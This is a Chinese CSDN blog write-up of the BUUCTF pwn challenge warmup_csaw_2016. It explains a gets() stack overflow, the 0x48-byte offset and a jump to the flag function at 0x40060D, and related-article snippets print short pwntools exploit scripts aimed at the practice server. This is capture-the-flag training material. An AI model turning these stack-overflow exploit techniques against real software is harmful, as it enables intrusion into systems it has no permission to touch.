Buuctf pwn warmup_csaw_2016

最新推荐文章于 2024-04-23 14:52:52 发布
最新推荐文章于 2024-04-23 14:52:52 发布
阅读量367 收藏 4
点赞数 9
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79960856/article/details/136378414
版权

1.检查文件

6b119ec6c429426caaa5417f38e31f71.png

 发现为64位

2.放入ida64反编译

5c6668e56be94857a5f23560f82b46a6.png

main函数中发现gets函数造成栈溢出

4169e5a9971b410c9c9b0c2f9e7a37c8.png7b5ebf1c5a044db29676f1854b1c58d1.png字符串窗口中发现flag,并寻其地址为40060d

 3.“访问”

创建脚本

c0e93428ad91420180f3e52c22a6eff5.jpg

 (参数大小

a7d78072b9b840bfbc0be1cf4a04700f.png

5d0d20a75cb9449c93dab0ac5db6a3ad.png 

 总大小为0×40+0×8

 

 

 

 

天真的少年
关注
BUUCTF|warmup_csaw_2016 1
cm_zl
04-30 1260
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()
BUUCTF - PWNwarmup_csaw_2016
古月浪子的博客
03-19 3275
checksec一下,发现啥保护也没开 IDA打开看看,又是明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.s...
BUUCTF-warmup_csaw_2016 (新手pwner的成长日记3)
最新发布
weixin_58410275的博客
04-23 1021
解释一下这里填充数据为什么是4*16,我们在ida里面双击v5这个字符进入栈区一看,它是在s的基础上,从0到40的var_40占用的是4*16个字节的空间,+8是因为64位文件的rbp需要填充。的函数,进去一看,不得了不得了,我们的payload直接利用sub_40060D函数就行了,甚至不需要获取shell权限,地址在反编译之前可以在函数末尾看见的,就不做展示了。由于文件的漏洞函数直接打开了flag文件,所以我们直接得到了flag的交互。然后我们再翻一翻,找一找,有个。gets的内容,这里思路就到达。
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 377
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...
warmup_csaw_2016
z1r0的博客
12-03 208
warmup_csaw_2016 查看保护 什么保护都没有开
BUUCTF pwn前三道
2301_80470992的博客
12-21 1030
gets_s(buffer,size)函数:从标准输入中读取数据,size表示的最多读取的数量,在这里是argv,没有定义是多大,所以我们就可以无限的输入。但是可以发现buffer就只有0xF字节的大小,输入超过0xF个字节以后,你就会溢出,你会覆盖返回地址。代码分析:俩个write函数输出,然后sprintf函数利用%p将sub_40060函数地址(其实就是system函数)打印出来放到s里面,然后由write函数打印出来,由于是64位所以write那是9,存在溢出条件,接下来就是要找后门函数地址了。
buuctf pwn刷题(1)
清霂的博客
01-30 1193
目录1.test_your_nc2.pwn13.warmup_csaw_2016 1.test_your_nc 先用exeinfo查壳,是64位的程序 用64位ida静态分析一下,找到main函数 F5反汇编,看到system("/bin/sh") system()的作用———执行shell命令也就是向dos发送一条指令。 即执行/bin/sh命令,获得shell权限 用虚拟机连node3.buuoj.cn:27191 nc node3.buuoj.cn 27191 查看文件目录 ls 查看flag
BUUCTF pwn前四题解答和培训内容整理笔记
lzglove666的博客
01-31 1517
我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。这时,我们需要知道对应返回的代码的位置。ROP(Return Oriented Programming),即返回导向编程,通过栈溢出内容覆盖返回地址,使其跳转到可执行文件中已有的片段代码中执行我们选择的代码段。对x64的参数,大部分情况下,前六个参数储存在寄存器内,无法直接使用简单的栈溢出修改寄存器内容,这时候我们需要解除ROPgadget工具进行辅助。
warmup_csaw_2016 1
weixin_52034946的博客
01-13 820
先checksec 是64位,小端序 进入ida,查看字符串 有一个cat flag 的字符串,跟进去,是这个函数,也就是执行这个函数我们就可以得到flag 一如既往的来到了main 函数处, 也是看到了get函数,一般就是栈溢出了,v5的大小位0x40,再加上是64位,所以要输入0x40+8,来造成栈溢出 脚本 from pwn import* r=remote(‘node3.buuoj.cn’,28011) flag_addr = 0x40060D payload = ‘a’*(0x40+8)+p6
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 4100
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
buuoj warmup_csaw_2016
weixin_52942048的博客
10-15 113
(1)v5的长度是40(双击点进去就可以看到长度)这里确定执行 cat flag.txt的地址即可。(2)返回地址8个字节。
buuctfwarmup_csaw_2016
weixin_54452942的博客
03-25 409
发现了一个gets函数可以溢出,并且在上面的运行中,我们看到他输出了一个地址,在下面的sprintf函数中将一个函数的地址输出了,我们去看看这个函数是干什么的。一种是ida直接看(不一定准),40h是64字节,再加8字节的rbp就是ret的位置。这里的返回地址,也就是rbp下面的地址是df28,我们输入的‘aaaaa’在dee0。是一个没有保护机制的64位x86架构的小端可执行程序。断在main函数地址,或者调用gets函数的地址也行。减一下刚好和ida中的一样。两种方式获得填充数据大小。
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 414
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
[BUUCTF]PWN------warmup_csaw_2016
BangSen1的博客
01-14 560
warmup_csaw_2016 例行检查 ,64位,无保护 运行一下,没什么信息。 用64位IDA打开,查看字符串,看到了cat flag,进去瞧瞧 可以看到这个函数的功能就是输出flag,记录下他的地址 flag_addr=0x40060D 再回到主函数瞧瞧,可以看到最后是输出了v5,gets函数并没有限制长度,因此存在溢出漏洞。v5的大小是0x40,因此只要我们输入的字符串长度=0x40+8(64位ebp的长度)即可溢出到返回地址,再将返回地址覆盖输出flag的那个函数地址即可 得到fla
buu:pwn warmup_csaw_2016
weixin_60553183的博客
11-29 2634
buu:pwn warmup_csaw_2016 第一次写pwn题,得到文件放入ida 其实一开始和re的题很像,都是寻找关键函数,怎么找,个人理解是要关注输入输出有无比较的地方,这里shb_40060D很明显就是关键函数,点进去,为什么呢,因为gets()函数很明显会有栈溢出漏洞,sub_40060D函数是后门。 找到了system和 cat flag.txt。 进入虚拟机,对文件进行checksec操作 发现没有任何防护 写exp 在终端运行得flag. ...
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 490
buuctf pwn
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1731
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值